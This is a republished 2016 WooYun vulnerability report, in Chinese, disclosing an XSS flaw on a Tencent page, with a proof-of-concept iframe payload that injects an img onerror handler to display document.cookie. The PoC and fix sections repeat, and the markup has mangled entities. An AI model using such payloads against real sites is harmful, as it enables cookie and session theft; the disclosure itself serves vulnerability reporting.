腾讯又一XSS被广泛用于黑产
漏洞标题 腾讯又一XSS被广泛用于黑产 相关厂商 腾讯 漏洞作者 %2e 提交时间 2016-05-05 12:43 公开时间 2016-06-20 22:20 漏洞类型 XSS 跨站脚本攻击 危害等…
漏洞标题
腾讯XSS广泛用于黑色生产
相关制造商
腾讯
漏洞作者
%2E
提交时间
2016-05-05 12: 43
公共时间
2016-06-20 22: 20
漏洞类型
XSS跨站点脚本攻击
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
XSS
漏洞详细信息
POC
&lt; iframe src='http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)&gt;' &GT;&LT;/iframe中&GT;
漏洞证明:
POC
&lt; iframe src='http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)&gt;' &GT;&LT;/iframe中&GT;
修理计划:
:) 没有
版权声明:请注明来源%2e @乌云
漏洞证明:
POC
&lt; iframe src='http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)&gt;' &GT;&LT;/iframe中&GT;
修理计划:
:) 没有
版权声明:请注明来源%2e @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 553 )
- 分类:黑客技术
